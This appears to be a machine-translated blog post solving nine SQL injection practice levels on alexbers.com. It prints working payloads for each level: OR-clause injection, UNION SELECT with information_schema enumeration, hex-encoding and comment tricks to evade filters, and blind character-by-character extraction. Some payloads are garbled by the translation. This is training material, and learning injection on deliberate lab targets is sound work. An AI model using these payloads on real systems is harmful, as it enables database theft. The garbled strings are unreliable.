Solving sql injection tasks from alexbers.com/sql

I want to share with “Habrakhabr” an example of my own solutions to the tasks on sql injections from the alexbers website.

Example 1: www.alexbers.com/sql/1.php

This is not even an example. It is required to write a request with previously known tables, user name.

 Given: 
 Table: users
 Fields: id, login, pass 

Decision:

 select * from users where id = '12 '

and the link will look like this:

  https://www.alexbers.com/sql/1.php?text=select+*+from+use+++ID%3D%2712%27 

Just request with all the data that we obviously know.

Example 2: www.alexbers.com/sql/qnbutn2.php

We are shown the request:

 select * from users where id = 2 or login = '$ text' 

Given:

 Table: users
 Fields: id, login, pass 
 Requirement: Hooray, I know the answer (user password with id = 9):

This example shows a primitive vulnerability: input data is not filtered in any way. Therefore, we can use quotes:

 https://www.alexbers.com/sql/qnbutn2.php?text=-1 'or id =' 9

What have we done? We led the query to this view:

 select * from users where id = 2 or login = '- 1' or id = '9'

We are trying to extract a user with id=2 or login=1 or id=9 from the users table, which is taken from the left quote and will be closed by the original request quote. Since user -1 does not exist, we get nothing from this query, but id=9 exists. As a result, we get a conclusion from 2 lines - a user with id=2 and with id=9 .

Example 3: www.alexbers.com/sql/sdjjy3.php

')
The request is again visible:

 select * from users where id = 2 or login = '$ text' limit 1 

Given:

 Table: users
 Fields: id, login, pass 
 Requirement: Hooray, I know the answer (user password with id = 13):

The difference with the previous example is the restriction on output to 1 line. Dancing away when making a comment that will “remove” the end of the line, i.e. It will not be processed.

Decision:

 https://www.alexbers.com/sql/sdjjy3.php?text=-1 'or id = 13 - 123

Type of request:

 select * from users where id = 2 or login = '- 1' or id = 13 - 123 'limit 1 

Thus, we throw out the restriction and retrieve the user with id = 13.

Example 4: www.alexbers.com/sql/qjqhweh4.php

Request:

 select * from users where id = 2 or login = '$ text' limit 1 

Given:

 Tables: users, secret
 Fields: id, login, pass - this is in users.  The secret table has 3 fields.
 Requirement: Hooray, I know the answer (given the secret table with the field ggg = abc):

A bit more interesting. Now we have 2 tables and the query is not executed on the table we need. We use the classic way. In mysql, there is a statement that allows you to query a different table after 1 query. To work with query merging, we need the same number of fields in all merged queries. We use the UNION operator. According to the task, it is required to find the given secret table with the field ggg=abc . The number of fields in the columns is the same, because the request will look like:

Request:

 https://www.alexbers.com/sql/qjqhweh4.php?text=-1'+union+select+* from secret where ggg = 'abc' + - + 123

One of the results will be the answer to the level.

Example 5: www.alexbers.com/sql/sdfkjsdk5.php

Request:

 select * from users where id = 2 or login = '$ text' limit 1

Given:

 Tables: users, secret
 Fields: id, login, pass - this is in users.  The secret table has 2 fields.
 Requirement: Hooray, I know the answer (given by the secret table):

Let's try to repeat the previous example. Find out how many columns in the users table, extract a list of all columns for a secret table. At the moment we do not have the same number of columns, so the union should be used differently.

 https://www.alexbers.com/sql/sdfkjsdk5.php
 ? text = 1 'union + select + 1, concat_ws (0x3a, table_name, column_name), 3 + from + information_schema.columns where table_name =' secret '- + 123

We see that we have 2 columns in the secret table, extract their values:

 https://www.alexbers.com/sql/sdfkjsdk5.php?text=-1 'union select 1, dfgdfgfdg, dfgfddfgdfdfdf from secret-- 123

We see the answer.

Example 6: www.alexbers.com/sql/skldj6

Request:

 select * from users where id = $ text limit 1 

Given:

 Tables: users
 Fields: id, login, pass - this is in users. 
 Quotes are filtered, only 1 line is output from the database.
 Requirement: Hooray, I know the answer (user password with the nickname god):

Here you can see a lack of understanding of the principles of the mysq_real_escape_string filter when the value of the id variable is not placed in quotes. Then, even though they are filtered 50 times, we don’t need them, you can use the CHAR() function for text fields or convert them to hex.

 https://www.alexbers.com/sql/skldj6.php?text=-1 union select id, login, pass from users where login = 0x676f64

Example 7: www.alexbers.com/sql/dsfhsdjkf7.php

Given:

 Tables: users
 Fields: id, login, pass - this is in users. Now, only the first line of the answer is always displayed (the rest are not displayed)
 Filters characters', ", +, =, comma, space, brackets
 Requirement: Hooray, I know the answer (user password, with a nickname that contains gentoo):

Request:

 select * from users where id = $ text limit 1 

Since the sample is immediately on the desired table, we do not even have to use the second query. Spaces are replaced with comments /**/ /*!*/ , Only one problem remains - the equal sign is filtered. But it can be circumvented using the like operator. Comparing with the string assumes quotes, so we encode it in hex. Also, we do not know for sure the nickname we are looking for, so we will use the search by mask with the % sign in the login. The final attack vector will look like:

 https://www.alexbers.com/sql/dsfhsdjkf7.php?text=-1/*!or/*!login*/like/**/0x2567656e746f6f25

Example 8: www.alexbers.com/sql/qqqwwweeerrr8.php

Request:

 select * from users where id = $ text

Given:

 Tables: users
 Fields: id, login, pass - this is in users.
 Hint: no error messages will appear. 
 Requirement: Hooray, I know the answer (user password, with the nickname fast)

The only thing that we generally get is something - the information that an error has occurred, or the number of displayed records. The number of records displayed is the only number we can manage. We are required to obtain a password from the user. A password is some information recorded in a numeric-letter form. All we can handle is numbers. So the password must be presented in numerical form. If we take and translate each character into an ascii – form, then any character from the password will be in the form of a number. To separate a character, we use the mid() function, to translate into ascii, the ascii() function, the attack vector will turn out like this:

 https://www.alexbers.com/sql/qqqwwweeerrr8.php
 ? text = -1 or id <= (select ascii (mid (pass, 1,1)) from users where login = 'fast')

The output will give us an ascii representation of the first character of the password. Further we do request for the second, etc.

Example 9: www.alexbers.com/sql/almost9.php

 Tables: users
 Fields: id, login, pass - this is in users.
 Query: select * from users where id = $ text
 Required: "Hurray, I know the answer (the numerical sum of user logins with 20 <= id <= 30)".

That is, we need to pull out the numerical value of each login and add. In this case, we will operate with the following comparison:

The attack vector is divided into 2 requests:

 https://www.alexbers.com/sql/almost9.php
 ? text = -1 or id <= cast ((select sum (login) from users where id between 20 and 30) as signed INTEGER) / 10
 https://www.alexbers.com/sql/almost9.php
 ? text = -1 or id <= MOD (cast ((select sum (login) from users where id between 20 and 30) as signed INTEGER), 10)

A total of 1069 records in the table, so we can not output an answer for one

example 10

The solution of the 10th problem is already described on YouTube, you can see it here: www.youtube.com/watch?v=dLSxTGvwcLw